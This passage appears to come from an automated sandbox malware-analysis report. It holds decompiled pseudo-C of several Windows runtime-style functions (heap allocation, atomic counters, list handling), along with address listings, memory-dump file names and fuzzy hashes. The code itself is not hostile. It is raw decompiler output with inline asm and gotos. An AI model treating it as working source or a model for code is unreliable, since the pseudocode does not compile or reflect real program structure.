					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E02AA2280(0xd, 0xd94f1a0);
				_t41 =  *0x2b760f8; // 0x0
				if(_t41 != 0) {
					 *0x2b760f8 =  *_t41;
					 *0x2b760fc =  *0x2b760fc + 0xffff;
				}
				E02A9FFB0(_t41, 0x800, 0xd94f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x2b760f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L02AA4620(0x2b76100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x2b76100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x02abbc36
0x02abbc42
0x02abbc45
0x02abbc4a
0x02abbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x02abbc50
0x02abbc50
0x02abbc58
0x02abbc5a
0x02abbc60
0x00000000
0x00000000
0x02afa4f2
0x02afa4f6
0x00000000
0x00000000
0x00000000
0x02afa4fc
0x02abbc79
0x02abbc7e
0x02abbc86
0x02abbd16
0x02abbd20
0x02abbd20
0x02abbc8d
0x02abbc94
0x02abbcbd
0x02abbcca
0x02abbccb
0x02abbccc
0x02abbccd
0x02abbcce
0x02abbcd4
0x02abbcea
0x02abbcee
0x02abbcf2
0x02abbd00
0x02abbd04
0x00000000
0x02abbc96
0x02abbcab
0x02abbcaf
0x02abbd2c
0x02abbd2c
0x02abbd09
0x00000000
0x02abbd09
0x02abbcb1
0x02abbcb5
0x02abbcbb
0x00000000
0x00000000
0x00000000
0x02abbcbb

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdae65f94dbd05fcfa68314792fb4ea285bb08d89ec3d34ea23210d18b787172
Instruction ID: 8b9263efa088a12c33bf5796b867f3d35ed13d4f8533e4162cf559b286500bd6
Opcode Fuzzy Hash: fdae65f94dbd05fcfa68314792fb4ea285bb08d89ec3d34ea23210d18b787172
Instruction Fuzzy Hash: A831AE36A00A159FCB52DF58D4C0BE673B8FF19319F044879ED48DB242EB789949CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AB1DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E02AB1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E02AAF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L02AA4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E02AAF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x02ab1dc2
0x02ab1dc5
0x02ab1dc7
0x02ab1dcc
0x02ab1dce
0x02ab1dd6
0x02ab1ddf
0x02ab1de0
0x02ab1de1
0x02ab1de5
0x02ab1de8
0x02ab1def
0x02ab1df0
0x02ab1df6
0x02ab1df7
0x02ab1dfe
0x02ab1e1a
0x00000000
0x00000000
0x02ab1e0b
0x02ab1e12
0x02ab1e12
0x02ab1e00
0x02ab1e00
0x02ab1e05
0x02ab1e1e
0x02ab1e23
0x02af570f
0x02af5713
0x00000000
0x00000000
0x02af5719
0x02af5719
0x02ab1e2c
0x02ab1e2d
0x02ab1e2e
0x02ab1e2f
0x02ab1e31
0x02ab1e32
0x02ab1e35
0x02ab1e3d
0x02af5723
0x02af573d
0x02af573d
0x00000000
0x02af5723
0x02ab1e49
0x02ab1e4e
0x02ab1e4e
0x02ab1e09
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 6b3151ba4c90882fc521161b7ee1c2146df22b449e040a7a9b24abf937320953
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 6A219C36A40218EFC722CF99CDA4EBBBBBDEF85644F114055F90997211DB74AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A89100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E02A89100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x2b5f6e8);
				E02ADD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E02B588F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E02ADD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x2b786c0; // 0x24807b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x2b786b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E02AA2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E02B588F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E02ACAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x2b7b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x2b784c0;
										if(_t69 >=  *0x2b784c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E02B59063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E02A8922A(_t82);
							_t53 = E02AA7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E02B58B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x2b786c0; // 0x24807b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x2b786b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x2b786bc;
										_t72 = 0x2b786b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E02A89240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x2b786c4;
									_t72 = 0x2b786c0;
									L18:
									E02AB9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x02a89100
0x02a89100
0x02a89100
0x02a89100
0x02a89102
0x02a89107
0x02a8910c
0x02a89110
0x02a89115
0x02a89136
0x02a89143
0x02ae37e4
0x02ae37e4
0x02a89149
0x02a8914e
0x02a8914e
0x02a89117
0x02a8911d
0x00000000
0x00000000
0x02a8911f
0x02a89125
0x00000000
0x02a89151
0x02a89158
0x02a8915d
0x02a89161
0x02a89168
0x02ae3715
0x00000000
0x02a8916e
0x02a8916e
0x02a89175
0x02a89177
0x02a8917e
0x02a8917f
0x02a89182
0x02a89182
0x02a89187
0x02a89187
0x02a8918a
0x02a8918d
0x02a8918f
0x02a89192
0x02a89195
0x02a89198
0x02a89198
0x02a89198
0x02a8919a
0x00000000
0x00000000
0x02ae371f
0x02ae3721
0x02ae3727
0x02ae372f
0x02ae3733
0x02ae3735
0x02ae3738
0x02ae373b
0x02ae373d
0x02ae3740
0x00000000
0x00000000
0x02ae3746
0x02ae3749
0x00000000
0x00000000
0x02ae374f
0x02ae3751
0x00000000
0x00000000
0x02ae3757
0x02ae3759
0x02ae375c
0x02ae375c
0x02ae375e
0x02ae375e
0x02ae3761
0x02ae3764
0x00000000
0x00000000
0x02ae3766
0x02ae3768
0x02ae37a3
0x02ae37a3
0x02ae37a5
0x02ae37a7
0x02ae37ad
0x02ae37b0
0x02ae37b2
0x02ae37bc
0x02ae37c2
0x02ae37c2
0x02ae37b2
0x02a89187
0x02a89187
0x02a8918a
0x02a8918d
0x02a8918f
0x02a89192
0x02a89195
0x00000000
0x02a89195
0x00000000
0x02a89187
0x02ae376a
0x02ae376a
0x02ae376c
0x02ae376c
0x02ae376f
0x02ae3775
0x00000000
0x00000000
0x02ae3777
0x02ae3779
0x00000000
0x00000000
0x02ae3782
0x02ae3787
0x02ae3789
0x02ae3790
0x02ae3790
0x02ae378b
0x02ae378b
0x02ae378b
0x02ae3792
0x02ae3795
0x02ae3795
0x02ae3798
0x02ae3798
0x02ae379b
0x02ae379b
0x02a891a3
0x02a891a9
0x02a891b0
0x02a891b4
0x02a891b4
0x02a891bb
0x02a891c0
0x02a891c5
0x02a891c7
0x02ae37da
0x02a891cd
0x02a891cd
0x02a891cd
0x02a891d2
0x02a891d5
0x02a89239
0x02a89239
0x02a891d7
0x02a891db
0x02a891e1
0x02a891e7
0x02a891fd
0x02a89203
0x02a8921e
0x02a89223
0x00000000
0x02a89223
0x02a89205
0x02a89208
0x02a8920c
0x02a89214
0x02a89214
0x02a891e9
0x02a891e9
0x02a891ee
0x02a891f3
0x02a891f3
0x02a891f3
0x02a891e7
0x00000000
0x02a891db
0x02a89187
0x02a89168

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ed03587344a5b096cdb1b1a8e752a0c663e2d5d69df33dd652dd527f691cc9
Instruction ID: f6b131500f1dac9c476b73ecdc85a52ecfcbdaeac21806a92dc2acaec080370c
Opcode Fuzzy Hash: 55ed03587344a5b096cdb1b1a8e752a0c663e2d5d69df33dd652dd527f691cc9
Instruction Fuzzy Hash: F931D275A04286DFDB61EB68C5C8BBEFBF2BF48354F188189D40567350DB34A988CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02AA0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02AA0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x2b7d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E02AB9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E02ACB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E02B58A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E02AB9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x2b7b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x02aa0055
0x02aa005d
0x02aa0062
0x02aa006c
0x02aa006f
0x02aa0074
0x02aa007a
0x02aa007a
0x02aa0080
0x02aa0080
0x02aa0087
0x02aa008d
0x02aa008f
0x02aa0093
0x02aa0095
0x02aa009b
0x02aa00f8
0x02aa00fb
0x02aa00fc
0x02aa00ff
0x02aa0108
0x02aa0108
0x02aa00a2
0x02aa00a6
0x02aa00b3
0x02aa00bc
0x02aa00c5
0x02aa00ca
0x02aec01e
0x00000000
0x00000000
0x02aec02d
0x02aa00d5
0x02aa00d9
0x02aec03d
0x02aec046
0x02aec046
0x02aa00df
0x02aa00e2
0x02aa00ea
0x02aa00ef
0x02aa00f2
0x02aa00f6
0x02aa0111
0x02aa0117
0x02aa0117
0x00000000
0x02aa00f6
0x02aa00d0
0x02aa00d0
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e4d42c94736b962ac01f202050d668fe0ea450f665e44d9a8bc4585cfe31e8
Instruction ID: 9327cdb68ab4567096714165441d219ba41b26ee89fc50141a1b2627c484d18b
Opcode Fuzzy Hash: 39e4d42c94736b962ac01f202050d668fe0ea450f665e44d9a8bc4585cfe31e8
Instruction Fuzzy Hash: CA318D31641B04CFD722CF28C991B97B3E6FF88714F14496DE59A87A90EF35A801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B06C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E02B06C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E02AA7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x2b77b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L02AA4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E02ACF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E02AA7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E02AC9AE0();
						_t23 = L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x02b06c0a
0x02b06c0f
0x02b06c10
0x02b06c13
0x02b06c15
0x02b06c19
0x02b06c1c
0x02b06c21
0x02b06c28
0x02b06c3a
0x02b06c2a
0x02b06c33
0x02b06c33
0x02b06c3f
0x02b06c48
0x02b06c4d
0x02b06c60
0x02b06c65
0x02b06c69
0x02b06c73
0x02b06c79
0x02b06c7f
0x02b06c86
0x02b06c90
0x02b06c94
0x02b06ca6
0x02b06cb2
0x02b06cbd
0x02b06cbd
0x02b06cc3
0x02b06cc7
0x02b06ccb
0x02b06cd0
0x02b06cd1
0x02b06ce2
0x02b06ce2
0x02b06c69
0x02b06ced

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a587ee000348207fb8c3b035a5d1bab1a0956676f73f2628ec1f54607b442204
Instruction ID: 3b071f3c1e6cc04614cd45cab3d823105e325efad273f957da515953110e290d
Opcode Fuzzy Hash: a587ee000348207fb8c3b035a5d1bab1a0956676f73f2628ec1f54607b442204
Instruction Fuzzy Hash: 8321AB71A00644AFC722DB68D980E2AB7B8FF48744F1400A9F805D7790EB34ED20CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02AC90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E02AC90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E02ADD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E02ABE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L02AA4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E02ACF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E02ABA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x02ac90af
0x02ac90b8
0x02ac90bb
0x02ac90bf
0x02ac90c2
0x02ac90c2
0x02ac90c8
0x02ac90cb
0x02ac90cd
0x02b014d7
0x02b014eb
0x02b014eb
0x00000000
0x02b014eb
0x02b014db
0x02b014e6
0x00000000
0x02b014f2
0x02b014e8
0x00000000
0x02b014e8
0x02ac90d8
0x02ac90da
0x02ac90dd
0x02ac90e5
0x00000000
0x02ac9139
0x02ac90fa
0x02ac90fe
0x02ac9142
0x00000000
0x02ac9142
0x02ac9104
0x02ac9107
0x02ac910b
0x02ac9110
0x02ac9118
0x02ac9147
0x02ac9148
0x02ac914f
0x02ac9150
0x02ac9151
0x02ac9152
0x02ac9156
0x02ac915d
0x02ac9160
0x02ac9168
0x02ac916c
0x02ac91bc
0x02ac91be
0x00000000
0x02ac91be
0x02ac916e
0x02ac9173
0x02ac9176
0x00000000
0x00000000
0x02ac917c
0x02ac9180
0x02ac91b5
0x00000000
0x02ac91b5
0x02ac9182
0x02ac9185
0x02ac9189
0x00000000
0x00000000
0x02ac918e
0x02ac9190
0x02ac9198
0x00000000
0x00000000
0x02ac91a0
0x00000000
0x02ac91ad
0x02ac91ad
0x02ac91b0
0x02ac91b1
0x00000000
0x02ac9185
0x02ac911a
0x02ac911c
0x02ac911f
0x02ac9125
0x02ac9127
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 4490496e4b50e3873d788a8e5c44c6da39beaf361409da7ae62601ea05729538
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 64217171A40605EFDB21DF59C585AAAFBF8EB44310F14846EE94997350DB70E904CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02AB3B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E02AB3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x2b784c4; // 0x0
				_v12 = 1;
				_v8 =  *0x2b784c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L02AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x2b784c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E02ACAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E02ACFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x2b784c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x2b784c4; // 0x0
					L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x02ab3b89
0x02ab3b96
0x02ab3ba1
0x02ab3bab
0x02ab3bb5
0x02ab3bb9
0x02af6298
0x02ab3bbf
0x02ab3bc2
0x02ab3bc3
0x02ab3bc9
0x02ab3bca
0x02ab3bcc
0x02ab3bcd
0x02ab3bd4
0x02ab3bd6
0x02ab3bdb
0x02ab3bea
0x02ab3bf7
0x02ab3bfb
0x02ab3bff
0x02ab3c09
0x02ab3c0a
0x02ab3c0b
0x02ab3c0f
0x02ab3c14
0x02ab3c18
0x02ab3c18
0x02ab3bfb
0x02ab3c1b
0x02ab3c30
0x02ab3c30
0x02ab3c3d

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

